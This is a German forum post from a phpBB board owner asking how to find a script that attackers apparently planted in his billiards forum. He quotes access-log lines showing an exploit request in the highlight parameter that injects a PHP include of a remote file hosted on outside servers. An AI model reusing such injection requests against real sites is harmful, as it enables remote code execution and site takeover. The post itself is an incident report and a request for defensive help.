gs-500.de - Hacker

Ich habe mal eine Frage zum Thema Hacker.

Mein Billard Forum wird seit einigen Tagen dauernd von Hackern abngegriffen (ich gehe mal davon aus, das die mir irgendwo ein Script untergejubelt haben).

Hat schon mal jemand etwas von diesen Hackern gehört : (modded by sirh0t fuck Aleks)" ???

Hat jemand eine Ahnung wie ich rausbekommen kann, wo dir mir das Script versteckt haben können ?

Ich habe schon die komplette Homepage vom Server genommen, ein Update aufgespielt (also nicht die gleichen Daten) und die Datenbank neu aufgespielt.

Langsam weiß ich keinen rat mehr.

In meiner access.log finden sich folgende Einträge :
Einträge vom 10. Dez.

Zitat:

205.234.100.65 - - [10/Dec/2005:14:39:28 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&
m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 17200 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)"

Einträge von heute :

Zitat:

195.225.236.162 - - [13/Dec/2005:22:16:30 +0100] "GET /forum/viewtopic.php?p=3735&highlight=%2527.$poster=inclu de($_GET[m]).%2527&m=http://makturk.com/irc/gallery/files/phpbb_private?& HTTP/1.0" 200 17340 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t and Aleks)"

Klar ist mir nur, das das Script immer das Posting 3735 mit Highlight 2527 sucht.
Die IP Adressen ändern sich alle paar Minuten.

Was mir persönlich jetzt auch nichts sagt, ist die türkische Adresse (http://www.yatas.com und http://www.matuk.com) und warum die google.ne Adresse da drin ist.